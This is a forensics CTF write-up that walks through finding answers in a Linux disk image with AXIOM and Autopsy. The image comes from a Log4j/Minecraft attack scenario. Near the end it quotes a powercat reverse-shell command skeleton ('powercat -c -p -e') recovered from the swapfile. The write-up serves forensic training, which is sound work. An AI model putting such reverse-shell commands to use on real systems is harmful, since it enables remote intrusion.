Magnet Forensics June 2022 CTF - Linux
This CTF was hosted by Magnet Forensics and was held on June 15, 2022, from 3 PM - 6 PM EST. Two datasets were provided - a Linux box and an iOS 15 FFS extract.
This question took much longer than I’d like to admit. I have no experience with Log4j so didn’t know what it was exactly. Apache Log4j is a Java-based logging utility. The answer was found in AXIOM > Web Related > Firefox Web History.
Or: by using Autopsy to traverse the filesystem - home\rafael\snap\firefox\common\.mozilla\firefox\mcrcm1xn.default\places.sqlite in the table moz_places
The operating system version can be found in AXIOM > OPERATING SYSTEM > Operating System Information – Linux
Or: by using Autopsy to traverse the filesystem to etc\lsb-release
Users with sudo privileges can change a hostname by invoking the hostenamectl command. Hostnames are used to make it easier to locate and distinguish devices on a network. You can find the hostname in AXIOM by going to:
AXIOM > OPERATING SYSTEM > Operating System Information - Linux
Or: by using Autopsy to traverse the filesystem to etc/hostname
Attack on Titan
I figured the little blue birdie was referring to Mozilla Thunderbird, a free and open-source cross-platform email client. However, I had no idea what I was looking for, as I am unfamiliar with anime. So I started browsing e-mails in Autopsy under Data artifacts > E-mail Messages > Default. There was an e-mail that contained Twitter highlights. I googled one of the highlights, “Attack on Titan,” and it appeared to be an anime, so I figured that was the answer.
Attack on Titan is a Japanese manga series written and illustrated by Hajime Isayama.
This one I went straight to google for after finding the account name. Gamers seem to keep track of all sorts of stats. I was unsure if the UUID is useful in Minecraft, but apparently, some websites will provide you with the UUID if you have the account name. I also later found this hint in the web history: "get Minecraft UUID of user." So if we head to https://mcuuid.net and input the username n30forever, we get the UUID.
There is also a screenshot located in the user folder for Rafael named RAOxspYx.jpeg. This has the UUID listed in the screenshot of the CMD. However, this is quite blurry; I found it easier to get it through the website I used above.
A third option is home/rafael/marshalsec/poc/GhTvNIel.jpeg – a bit clearer than the screenshot above.
There were e-mails in the other Magnet CTF that showed information about the Guest Wi-Fi Connection, so I decided to head over to the e-mails to check there first. Using Autopsy, I headed to Data Artifacts > E-mail Messages > Default and sorted by name. I found four e-mails from email@example.com welcoming Rafael to the Wi-Fi network, Champlain Guest. I clicked on the oldest one to find the first password provided.
Installing software on a computer running Linux is done by using the terminal. Therefore, I figured I would find this answer in the bash history file. Using Autopsy, head to Data Sources/LenovoFinal.E01/vol5/home/rafael/.bash_history. Here we can see that the user installed zerotier directly from the zerotier website using the curl command. Curl, short for Client URL, is a command-line tool that transfers data to or from a server. The -s option will turn on silent mode, which will mute curl. Muting curl will not show a progress meter or error messages.
At first, I thought there might be a site that keeps track of view history. However, I remember seeing screenshots, and the “picture is worth a thousand words” led me to believe there might be something on one of those screenshots. There are five screenshots in Rafael’s Pictures folder, home/rafael/Pictures. In three screenshots, you can see Firefox open on a YouTube page. The YouTube video is titled “CVE-2021-44228 – Log4j – MINECRAFT VULNERABLE!” released on December 11, 2021, by John Hammond. The February 9 date can be found in the timestamps and at the top of the desktop taskbar.
I stumbled across this answer while browsing through the photos for another question. This photo can be located at: home/rafael/marshalsec/poc/aaGkBJdu.jpeg
If we google “Binging with Babish,” we find the YouTube channel on page 1 of the results. Click on the YouTube link, and it will take you to “Babish Culinary Universe.”
Follow along with my torso every week as I recreate the iconic and obscure foods from your favorite movies and TV shows, all in dazzling 4K. We'll make some delicious dishes, have a little fun, and if you're not careful, you might just learn a thing or two".
The song Never Gonna Give you Up by Rick Astley was found in Rafael’s Downloads folder. So we can go to the web history to see what YouTube Channel he went to in order to find the second upload. Rafael was on Rick Astley’s official YouTube channel. If you click on Videos and scroll to the bottom, you will find the second uploaded video, “Whenever You Need Somebody.”
I was overthinking this one at first because of the question title "Buzzy Bees." Looking up the Buzzy Bees Minecraft update, it appears that the versions included in this update are 1.14 and 1.15. The question asks for the latest release of Minecraft, so I just focused on the most recent release that was on the machine. Using Autopsy, we can head to home/rafael/.minecraft/versions/1.18.1. This version is the latest release according to the system, and the hash can be found in the 1.18.1.json file. I had to try a few SHA-1 hashes before getting the correct one.
Located in the pictures directory is a screenshot of a windows machine. The weather, date and time can be found on the taskbar. This screenshot was located in the same folder as the cookbook challenge question. home/rafael/marshalsec/poc/aaGkBJdu.jpeg
powercat -c -p -e
Powercat is used to send and serve shells. To get the answer to this question, I searched for “powercat” in Autopsy. The answer can be found in the swapfile.
💥🔎If this has inspired you to practice your forensic skills, Magnet Forensics and many other authors have uploaded datasets on the Computer Forensic Reference DataSet Portal (CFReDS).